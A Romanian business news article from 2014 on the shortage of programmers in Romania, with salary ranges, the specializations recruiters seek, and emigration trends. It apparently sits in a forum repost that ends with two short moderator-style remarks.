Cel mai dorit job din Romania: salariul urca la 6.000 de euro, somajul NU exista, mii de locuri raman neocupate Alice Gheorghe , 28 Jan 2014 Meseria de programator sta in fruntea listelor canalelor de recrutare, companiile duc lupte grele pentru a-i atrage si mentine pe specialisti, iar salariile de top pentru aceasta pozitie depasesc si de 10-15 de ori venitul mediu al romanilor. WALL-STREET.RO iti arata tot ce trebuie sa stii despre una dintre cele mai banoase si cu potential profesii din Romania. In piata din Romania sunt peste 60.000 de specialisti in domeniul IT, programatori fiind mai mult de jumatate dintre ei, potrivit datelor companiei de recrutare IT Temps. “Anual se creeaza aproximativ 5.000-6.000 de posturi noi, insa oferta de candidati este limitata la 2.000-3.000 de noi absolventi” a declarat pentru WALL-STREET.RO Gabriela Dan, CEO al Temps, companie de recrutare IT, parte a grupului Rinf Outsourcing Solutions. Mai departe, noile posturi deschise se inchid printr-o mobilitatea a candidatilor dintr-o companie in alta. Programatorii, cei mai cautati IT-isti Astfel, cea mai mare parte dintre job-uri disponibile in bazele de date ale agentiilor sau site-urilor de recrutare sunt cele din domeniul IT. La randul lor, acestea sunt dominate in general de pozitiile de programator. “40% din cererile de angajare pe zona de IT sunt pentru programatori”, a precizat Bogdan Florea, director general al companiei de recrutare Trenkwalder. “Avand in vedere boom-ul tehnologic din ultimii 5 ani, ce a adus in prim-plan limbaje de programare noi, meseria de programator ocupa un loc de top. Acest lucru se datoreaza nevoii de a crea aplicatii si platforme IT, ce vor inlocui sistemele clasice de informatii”, a explicat Cristina Savuica, sefa companiei de recrutare Lugera. Si in randul programatorilor exista un top in ceea ce priveste cele mai cautate specializari, iar in prezent pe piata locala sunt la mare cautare dezvoltatorii Java, urmati de C++ si Mobile (Android si IOS). “Programatorii de solutii enterprise sunt cei mai cautati, datorita anvergurii extinse pe care acest tip de proiecte o poate atinge. In ultima perioada Java Enterprise (J2EE) este un limbaj preferat pentru majoritatea acestor proiecte, secundat de catre solutiile Microsoft precum ASP .NET si .NET. De asemenea, observam o crestere rapida a nevoii de programatori cu experienta cel putin teoretica in servicii de tip Big Data sau Cloud. Conform unor studii LinkedIn, din 2008 nevoia a crescut de 3.440 ori pentru Big Data si 195 ori pentru Cloud services”, a detaliat Savuica. Cat castiga un programator in Romania Daca ai notiuni teoretice in domeniu solide si esti absolvent de automatica, cibernetica, informatica poti deja sa te gandesti la un salariu la care majoritatea romanilor nici nu viseaza. Sansele tale cresc daca inca din timpul facultatii te-ai implicat in proiecte de programare. In timp ce un incepator poate sa castige la primul job 500-600 de euro, ceea ce nu este deloc putin pentru piata locala, salariul unui profesionist in domeniu poate sa urce pana la 6.000 de euro lunar. “Un programator entry-level incepe de la un salariu mediu de 700 de euro, un junior in domeniu, cu 1-3 ani de experienta, castiga aproximativ 1.000 de euro, iar un specialist cu 3-6 ani de experienta urca la 2.000 de euro lunar. Seniorii ajung sa castige si 6.000 de euro pe luna”, au precizat reprezentantii companiei de recrutare Adecco. Astfel, intr-o piata cu tentatii mari, fluctuatia pe aceasta pozitie este destul de ridicata. “Avand in vedere ca piata ofera foarte multe "tentatii" la nivel financiar, este destul de greu sa retii oamenii in companie daca nu ai si programe de dezvoltare solide. Pe pozitiile de PHp, de exemplu, exista o fluctuatie foarte foarte mare, programatorii buni fiind sunati de cel putin doua ori pe saptamana de catre un posibil ofertant de job”, a mentionat Gabriela Dan, CEO al Temps. Developerii sunt momitii cu pachete financiare generoase la care se adauga diverse bonusuri, in functie de performanta. Cum te faci cautat pe aceasta piata “Un programator fara experienta trebuie sa acceseze cat mai multe cursuri si certificari on line. De asemenea, acesta trebuie sa isi constituie experienta prin inscriere pe site-uri consacrate de proiecte de programare, sa isi asume si sa duca la bun sfarsit proiecte mici, care insa contribuie la un cumul de experiente demonstrabile, project based”, sfatuiesc specialistii Adecco. De asemenea, importanta este si dobandirea cunostintelor de business necesare pentru a vedea impactul solutiilor dezvoltate atat pentru useri, cat si pentru business. “Este importanta dobandirea unei priviri de ansamblu asupra modului in care se integreaza diferitele arhitecturi de sisteme”, potrivit Lugera. Ce cauta angajatorii si nu gasesc Cei care se gandesc in prezent la o cariera in domeniul programarii trebuie sa stie ca sunt cateva specializari pentru care angajatorii gasesc cu greu candidatii potriviti. Recrutorii vorbesc despre o serie de specializari pe care le acopera cu greu, intre care programatorii Java, in special Java Mobile, C++ sau tehnologiile exotice de tip hadoop si magento. “Greu de acoperit sunt si specializarile cu salarii minime, pentru ca un specialist in IT vine si ramane la o companie daca aceasta are o reputatie buna, daca investeste in oameni, in certificari pentru acestia, daca le ofera acces la tehnologii performante”, spun specialistii Adecco. Specialistii romani sunt doriti si in afara O companie de top, experienta unui loc de munca intr-o alta cultura si, nu in ultimul rand, un salariu considerabil ii pot tenta pe tinerii care primesc o oferta din strainatate. “Unele companii straine ofera solutii colaborative de lucru la distanta, pentru a adresa nevoile echipelor distribuite de programatori. Companiile de peste hotare ofera oportunitati atractive si sunt dispuse sa ofere beneficii considerabile celor mai inovativi programatori. De obicei, se orienteaza catre cei mai inteligenti tineri absolventi de facultati sau targeteaza lideri inovativi cu o experienta rafinata in IT. Marii jucatori globali in tehnologie precum Google, Apple ii atrag pe tinerii programatori ce obtin performante outstading in diferitele consursuri, programe educationale si conferinte de IT pe care firmele le organizeaza online”, a explicat Cristina Savuica. Majoritatea tinerilor merg in afara pentru o experienta de cativa ani, avand mereu in plan reintoarcerea in tara. “Companiile mari, ca Google, Facebook, Apple, Microsoft atrag usor, datorita numelor din spate, si aici, insa programatorii romani nu se gandesc la o stabilire permanenta in extern, o fac pentru cativa ani, strang banii necesari pentru o independenta frumoasa in tara si revin pe plaiurile mioritice”, a precizat Gabriela Dan. Viitorul suna bine Fie ca aleg sa mearga in strainatate sau se specializeaza in tara, programatorii par sa aiba asigurat un loc de munca in urmatorii multi ani de zile. Piata este in continua crestere, iar in ciuda crizei economice, salariile raman la fel de bine platite. In 2014 majoritatea companiilor din domeniul IT vor angaja, potrivit datelor Temps. Dupa comunicatele transmise de catre aceste companii, iar cei mai mari angajatori vor fi Microsoft, Dell, Endava, Luxoft, IBM, Oracle, Deutsche Bank. Mai mult, un aspect important pentru acest domeniu este ca statul roman a oferit un plan de ajutor catre sapte companii care au in plan sa angajeze aproximativ 1.000 de programatori anul acesta in Romania, printre care Microsoft, Dell si Deutsche Bank. Sursa: Cel mai dorit job din Romania: salariul urca la 6.000 de euro, somajul NU exista, mii de locuri raman neocupate

Really nice video collection. Sticky.

Vanzarile se fac la RST Market doar de catre persoane care au 50+ posturi. Ban o saptamana.